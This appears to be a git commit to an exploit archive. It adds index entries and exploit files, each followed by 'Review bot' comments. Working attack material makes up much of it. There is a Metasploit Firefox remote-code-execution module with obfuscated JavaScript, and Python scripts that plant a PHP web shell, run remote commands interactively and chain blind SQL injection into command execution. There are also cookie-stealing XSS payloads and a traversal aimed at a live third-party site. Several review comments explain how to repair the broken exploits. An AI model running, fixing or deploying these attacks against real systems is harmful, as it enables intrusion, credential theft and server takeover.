Updated 08_30_2014

Offensive Security 2014-08-30 04:42:49 +00:00
parent 3014afc96e
commit c93cd0e1b8
29 changed files with 1136 additions and 0 deletions

@ -31006,9 +31006,37 @@ id,file,description,date,author,platform,type,port
34421,platforms/linux/local/34421.c,"glibc Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0
34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0
34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0
34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 '.m3u' File Buffer Overflow Vulnerability",2010-08-09,"Abhishek Lyall",windows,dos,0
34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0
34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0
34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 'doSave.jsp' Remote Code Execution Vulnerability",2010-08-12,"Giorgio Fedon",jsp,webapps,0
34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection Vulnerability",2010-05-13,"Giorgio Fedon",php,webapps,0
34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability",2009-09-19,the_Edit0r,windows,dos,0
34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 'scrivi.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
34444,platforms/php/webapps/34444.txt,"RSSMediaScript 'index.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0
34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0
34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80
34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,metasploit,multiple,remote,0
34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0
34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34452,platforms/php/webapps/34452.py,"XRMS - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0
34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0
34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0
34458,platforms/windows/dos/34458.html,"Internet Explorer MS14-029 Memory Corruption PoC",2014-08-28,PhysicalDrive0,windows,dos,0
34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
34463,platforms/windows/local/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,local,0
34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0
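Review bot: the description field for 34426 (`uzbl \'uzbl-core\' \'@SELECTED_URI\' ...`) uses backslash-escaped single quotes inside a double-quoted CSV field, while every other entry in this hunk (for example 34427's `'ssl3_get_key_exchange()'`) uses bare single quotes; a CSV reader keeps those backslashes literally, so drop them. Also worth a look: the `port` column is 80 for 34447 and 34450-34452 but 0 for every other `webapps` entry, which makes the column inconsistent for the same category of exploit.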

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42413/info
Computer Associates Oneview Monitor is prone to a remote code-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to inject and execute arbitrary JSP code in the context of the affected webserver.
The following example URI is available:
ttp://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp
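Review bot: the example URI on the last line reads `ttp://www.example.com/...`, missing the leading `h` of `http://`; restore it so the line is a valid URL. For anyone writing a detection or filtering rule from this entry, the relevant detail is that the `file` parameter of `doSave.jsp` accepts a `../`-prefixed path, which the text should state explicitly instead of leaving it to be read out of the URL.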

platforms/linux/dos/34427.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42306/info
OpenSSL is prone to a remote memory-corruption vulnerability.
Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in a denial-of-service condition.
The issue affects OpenSSL 1.0.0a; other versions may also be affected.
http://www.exploit-db.com/sploits/34427.zip
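Review bot: this entry gives no CVE identifier and no fixed version: it names 1.0.0a as affected and says other versions may be too, which leaves a reader unable to tell whether a given deployment is exposed. Add the CVE and the first fixed release alongside the Bugtraq ID; the zip link alone does not carry that information.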

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42428/info
Sniper Elite is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Versions prior to Sniper Elite 1.0 are vulnerable.
http://www.exploit-db.com/sploits/34457.zip
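Review bot: the affected-version line says "Versions prior to Sniper Elite 1.0 are vulnerable", but the CSV entry for 34457 in this same commit titles the issue "Sniper Elite 1.0 - NULL Pointer Dereference ...", so the two disagree on whether 1.0 itself is affected; make them consistent with the Bugtraq source. The hedge that code execution "has not been confirmed" is the right caveat to keep for a NULL-pointer dereference classified as `dos`.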

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/42411/info
ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to gain administrative access to the affected application and to obtain sensitive information that could aid in further attacks.
Versions prior to ServletExec 6.0.0.2_39 are vulnerable.
http://www.example.com/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
http://www.example.com/servlet/pagecompile._admin._login_xjsp
http://www.example.com/servlet/pagecompile._admin._vmSystemProperties_xjsp
http://www.example.com/servlet/pagecompile._admin._SELogging_xjsp
http://www.example.com/servlet/pagecompile._admin._userMgt_xjsp
http://www.example.com/servlet/pagecompile._admin._virtualServers_xjsp
http://www.example.com/servlet/pagecompile._admin._optionalPackages_xjsp
http://www.example.com/servlet/pagecompile._admin._dataSources_xjsp
http://www.example.com/servlet/pagecompile._admin._debug_xjsp
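Review bot: only the first URL is self-explanatory (the `page=../../WEB-INF/web.xml` traversal); the eight `pagecompile._admin._*_xjsp` URLs that follow are listed without saying what each demonstrates. Add a line stating that these are the authentication bypasses the summary refers to, and which of them disclose data (`vmSystemProperties`, `dataSources`) versus expose actions (`userMgt`, `SELogging`). The version line already implies the mitigation (upgrade to 6.0.0.2_39 or later); say so, and suggest restricting direct requests to `/servlet/pagecompile.*` at the front end until the upgrade is done.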

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/exploitation/jsobfu'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
autopwn_info({
:ua_name => HttpClients::FF,
:ua_maxver => "22.0",
:ua_maxver => "27.0",
:javascript => true,
:rank => ExcellentRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox WebIDL Privileged Javascript Injection',
'Description' => %q{
This exploit gains remote code execution on Firefox 22-27 by abusing two
separate privilege escalation vulnerabilities in Firefox's Javascript
APIs.
},
'License' => MSF_LICENSE,
'Author' => [
'Marius Mlynski', # discovery and pwn2own exploit
'joev' # metasploit module
],
'DisclosureDate' => "Mar 17 2014",
'References' => [
['CVE', '2014-1510'], # open chrome:// url in iframe
['CVE', '2014-1511'] # bypass popup blocker to load bare ChromeWindow
],
'Targets' => [
[
'Universal (Javascript XPCOM Shell)', {
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[
'Native Payload', {
'Platform' => %w{ java linux osx solaris win },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(22, 27) }
}
))
register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
], self.class)
end
def on_request_exploit(cli, request, target_info)
send_response_html(cli, generate_html(target_info))
end
def generate_html(target_info)
key = Rex::Text.rand_text_alpha(5 + rand(12))
frame = Rex::Text.rand_text_alpha(5 + rand(12))
r = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
// Load the chrome-privileged browser XUL script into an iframe
var c = new mozRTCPeerConnection;
c.createOffer(function(){},function(){
window.open('chrome://browser/content/browser.xul', '#{frame}');
step1();
});
// Inject a data: URI into an internal frame inside of the browser
// XUL script to pop open a new window with the chrome flag to prevent
// the new window from being wrapped with browser XUL;
function step1() {
var clear = setInterval(function(){
// throws until frames[0].frames[2] is available (when chrome:// iframe loads)
frames[0].frames[2].location;
// we base64 this to avoid the script tag screwing up things when obfuscated
frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
clearInterval(clear);
setTimeout(step2, 100);
},10);
}
// Step 2: load the chrome-level window up with a data URI, which
// gives us same-origin. Make sure to load an "<iframe mozBrowser>"
// into the frame, since that will respond to our messageManager
// (this is important later)
function step2() {
var clear = setInterval(function(){
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
'src="about:blank"></iframe></body></html>';
clearInterval(clear);
setTimeout(step3, 100);
}, 10);
}
function step3() {
var clear = setInterval(function(){
if (!frames[0]) return; // will throw until the frame is accessible
top.vvv.messageManager.loadFrameScript('data:,'+key, false);
clearInterval(clear);
setTimeout(function(){top.vvv.close();}, 100);
}, 10);
}
|)
js.obfuscate
%Q|
<!doctype html>
<html>
<body>
<iframe id='#{frame}' name='#{frame}'
style='position:absolute;left:-9999999px;height:1px;width:1px;'>
</iframe>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
end
end
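Review bot: `autopwn_info` sets `:ua_maxver` twice (`"22.0"` then `"27.0"`); in a Ruby hash literal the second key wins, so the first entry is dead and Ruby warns about the duplicate. Given that `BrowserRequirements` restricts `:ua_ver` to `between?(22, 27)`, the first entry was almost certainly meant to be `:ua_minver => "22.0"`. Minor: the download URL in the header comment is `http//metasploit.com/download` (missing colon). On the defensive side, the module names CVE-2014-1510 and CVE-2014-1511 and the affected range Firefox 22-27, which is what a patch-compliance check should key on.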

@ -0,0 +1,19 @@
>> User credential disclosure in ManageEngine DeviceExpert 5.9
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
>> Background on the affected product:
"DeviceExpert is a webbased, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management."
>> Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable
GET /ReadUsersFromMasterServlet
Example response:
<?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
The passwords are a salted MD5 hash.
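Review bot: the advisory states the endpoint needs no authentication, and the example response returns the username, the password hash and the `saltvalue` together, so the closing line ("The passwords are a salted MD5 hash") understates the impact: with the salt disclosed next to the hash, offline guessing is feasible, and the entry should be treated as a credential disclosure rather than a hash leak. Since the status is "UNFIXED as of 27/08/2014", add the interim mitigations a reader needs: restrict network access to the DeviceExpert web interface, and rotate the administrator password once a fix is applied.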

platforms/php/webapps/34436.txt Executable file
@ -0,0 +1,40 @@
#################################################################################################
#
# Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 1.1
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/
# Date : 25/08/2014
# Tested in : Win7 - Kali Linux
# CVE : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
# $file = $_GET['file'];
# if(isset($file))
# {
# include("pages/$file");
# }
# else
# {
# include("index.php");
# }
#
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################
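Review bot: the "Demo" line points at a live third-party site (`llyndamoreboots.com`) with the `../wp-config.php` payload; an advisory should not name an uninvolved site as a target, so replace it with the `localhost` form already used in the PoC lines above. The block labelled "Exploit Code" is actually the vulnerable plugin source (`include("pages/$file")` with `$file` taken straight from `$_GET`), so retitle it "Vulnerable Code"; the missing check is that `$file` is never constrained to a plain filename inside `pages/`. The header says "Plugin Name : Download ShortCode" while the title says "WordPress ShortCode Plugin"; use the plugin's actual name in both.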

platforms/php/webapps/34438.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42406/info
TagCloud is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
TagCloud version 2.0 is vulnerable; other versions may also be affected.
The following example input is available:
'Topic' Field: <script>javascript:alert("lolcats")</script>
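Review bot: the advisory names the input ("Topic" field) but not the page or form that accepts it, so the issue cannot be reproduced or checked for a fix from this text alone; add the URL of the form. The CSV entry for 34438 names the product "MybbCentral TagCloud 2.0" while this text says only "TagCloud"; include the vendor so the affected software is unambiguous.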

platforms/php/webapps/34441.txt Executable file
@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/42414/info
JForum is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
JForum 2.08 is vulnerable; other versions may also be affected.
Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):
[color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color]
Renders into the following HTML code:
<font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'>XSS4FF</font>
Stored XSS - proof of concept for Internet Explorer ("style" cannot contain parenthesis "(" ):
[color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color]
Renders into the following HTML code:
<font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font>
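Review bot: the Firefox PoC says `onMouseOver` is blacklisted and then uses `/onMouseOver=` in the payload, which reads as a contradiction; state that the leading `/` inside the `[color=...]` value is what gets the attribute past the blacklist, so the fix is understood as "do not build HTML attributes from BBCode values" rather than "extend the blacklist". The rendered HTML lines show the root cause clearly: the `color` value is interpolated into the `<font>` tag unescaped. The IE PoC relies on CSS `expression()`, which only legacy Internet Explorer evaluates; note that so the severity is not over-read for other browsers.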

platforms/php/webapps/34443.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42420/info
PaoLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PaoLink 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/paolink/demo/scrivi.php/"><script>alert(document.cookie);</script>
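Review bot: the PoC places the payload in the path info after `scrivi.php/`, but the text does not say where the request path is echoed, so a maintainer checking a fix has nothing concrete to look at; add the reflection point. The same path-info pattern appears in the PaoBacheca entries 34453 and 34454 in this commit, so it is worth cross-referencing them.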

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42421/info
RSSMediaScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/demo/index.php?cat=5&page=1"><script>alert(document.cookie);</script>
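Review bot: this is the one XSS advisory in the commit with no affected-version line, and the CSV entry for 34444 carries no version either; add one, or state that none was established, so the entry is not read as applying to every release. The PoC shows the `page` parameter of `index.php` reflected unescaped, which is the parameter a fix and a regression test should cover.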

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42422/info
LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
LiveStreet 0.2 is vulnerable; other versions may also be affected.
<img src =. onerror = alert ()>
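Review bot: the payload `<img src =. onerror = alert ()>` is given without any indication of where it is submitted; the CSV entry for 34445 says "Comment Topic Header", so add that field name here. The unusual spacing inside the tag looks like a formatting accident; if it is deliberate, say so.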

platforms/php/webapps/34446.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42422/info
LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
LiveStreet 0.2 is vulnerable; other versions may also be affected.
Cross Site Scripting:
/include/ajax/blogInfo.php?asd=<script>alert(&#039;www.example.com&#039;)</script>
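Review bot: the payload is HTML-entity encoded (`&#039;` for `'`), which suggests it was copied from a rendered page rather than from the request; in a raw URL the quote would be `'` or `%27`, so either decode it or say the entity form is intended. The first four lines are a verbatim copy of 34445's text; since both entries cite the same Bugtraq ID (42422), consider cross-referencing them instead of duplicating.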

platforms/php/webapps/34447.py Executable file
@ -0,0 +1,82 @@
#!/usr/bin/env python
# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223
import hashlib
import os
import zipfile
import requests
import time
import argparse
def login(session,host,username,password):
print "[+] Log in"
session.post('http://%s/plog-admin/plog-upload.php' % host, data={
"plog_username": username,
"plog_password": password,
"action": "log_in"
})
def upload(session):
print "[+] Creating poisoned gift"
## Write the backdoor
backdoor = open(magic + '.php', 'w+', buffering = 0)
backdoor.write("<?php system($_GET['cmd']) ?>")
backdoor.close
# Add true image file to block the race condition (mandatory not null)
image = open(magic + '.png', 'w+', buffering = 0)
image.write('A')
image.close
gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
gift.write(magic + '.php')
gift.write(magic + '.png')
gift.close
os.remove(magic + '.php')
os.remove(magic + '.png')
gift = open(magic + '.zip', 'rb')
files= { "userfile": ("archive.zip", gift)}
session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
data = {
"destination_radio":"existing",
"albums_menu" : "1",
"new_album_name":"",
"collections_menu":"1",
"upload":"Upload"
})
os.remove(magic + '.zip')
print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)
if __name__== "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--host" , help="Remote host",required=True)
parser.add_argument("--user" , help="Username",required=True)
parser.add_argument("--password" , help="Password",required=True)
args = parser.parse_args()
host = args.host
username = args.user
password = args.user
magic = hashlib.sha1(time.asctime()).hexdigest()
session = requests.session()
login(session,host,username,password)
upload(session)
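Review bot: `password = args.user` ignores the `--password` argument and sends the username in both fields; it should be `args.password`. `backdoor.close`, `image.close` and `gift.close` are attribute references, not calls (missing parentheses), so nothing is closed explicitly: the `buffering = 0` files are flushed anyway, but a `ZipFile` only writes its central directory on `close()`, so the archive is complete only because rebinding `gift` lets CPython garbage-collect the object first. `host` and `magic` are used as globals inside `upload()`; pass them as parameters the way `login()` does. The script is Python 2 only (`print` statements, `hashlib.sha1()` on a `str`).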

platforms/php/webapps/34450.py Executable file
@ -0,0 +1,47 @@
###############################
# ActualAnalyzer exploit.
# Tested on Lite version
# We load command into a dummy variable as we only have 6 characters to own the eval
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################
import urllib
import urllib2
import sys
import time
def banner():
print " ____ __ __ __ "
print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____"
print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/"
print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / "
print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ "
print " /_/ /____/ "
def usage():
print " [+] Usage:"
print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""
banner()
if len(sys.argv) < 6:
usage()
quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]
def commandexploit(domain,host,command):
url = 'http://' + domain + '/aa.php?anp=' + host
data = None
headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
exploit1 = urllib2.Request(url,data,headers)
exploit2 = urllib2.urlopen(exploit1)
commandexploit(domain,host,command)
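Review bot: `host = syst.argv[4]` is a typo for `sys.argv` and raises `NameError` before any request is made. The argument check `len(sys.argv) < 6` is off by one: `sys.argv[6]` is read two lines later, so the minimum length is 7 and a call with exactly six arguments fails with `IndexError` instead of printing usage; `argparse` (as 34447 uses) would fix both the check and the fixed-position parsing. `urllib` and `time` are imported but unused. The header comment dates this to 11/05/2011 while the CSV entry says 2014-08-28; state which is the discovery date and which the publication date.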

platforms/php/webapps/34451.py Executable file
@ -0,0 +1,53 @@
###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
#/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/
# /_/ /_/ /_/
# Diskovered in Nov/Dec 2011
###############################################################
import urllib
import urllib2
import sys
def banner():
print " ____ __ _ __ _ "
print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)"
print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / "
print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
print " /_/ /_/ /_/ \n"
def usage():
banner()
print " [+] Usage example"
print " [-] python " + sys.argv[0] + " http://path.to/wiki"
if len(sys.argv)< 2:
usage()
quit()
domain = sys.argv[1]
def commandexec(cmd):
data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
cmd2 = urllib2.urlopen(cmd1)
output = cmd2.read()
firstloc = output.find("123:::\n") + len("123:::\n")
secondloc = output.find("\n:::123")
return output[firstloc:secondloc]
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
cmd = raw_input('Run a command: ')
if cmd == 'quit':
print "[-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print commandexec(cmd)
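Review bot: the loop `while(quit != 1)` compares the builtin `quit` object against 1, which only works because the module later assigns its own `quit = 1`; use an explicit flag or `break` rather than shadowing a builtin. `banner()` is printed twice when usage is shown (once from `usage()`, once at module level). `commandexec` relies on `find()` returning -1 on a miss, in which case `output[firstloc:secondloc]` returns a garbage slice instead of reporting that the marker strings were not found; check for -1 and fail loudly. The header names no affected PhpWiki version, and neither does the CSV entry; add one.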

platforms/php/webapps/34452.py Executable file
@ -0,0 +1,233 @@
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
import urllib
import urllib2
import time
import sys
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
print """ ____
/ __/_ ______ _ _ ___________ ___ _____
/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
/ __/ /_/ / /_/ / _> </ / / / / / / (__ )
/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/
/_/
[+] fuq th3 w0rld, fuq ur m0m!\n"""
def usage():
print " [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
print " [+] Example:"
print " [+] python " + sys.argv[0] + " domain.to/xrms"
quit()
def sendhashaway(hash):
print " [+] Sending hash to icrackhash.com to be cracked."
data = None
headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
gh = urllib2.Request(url,data,headers)
gh2 = urllib2.urlopen(gh)
output = gh2.read()
plaintext = getpositions(output,'<td><small><strong>','</strong>')
print " [-] Plaintext of hash: " +plaintext + "\n"
return plaintext
def username(length):
length = length + 1
duser = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
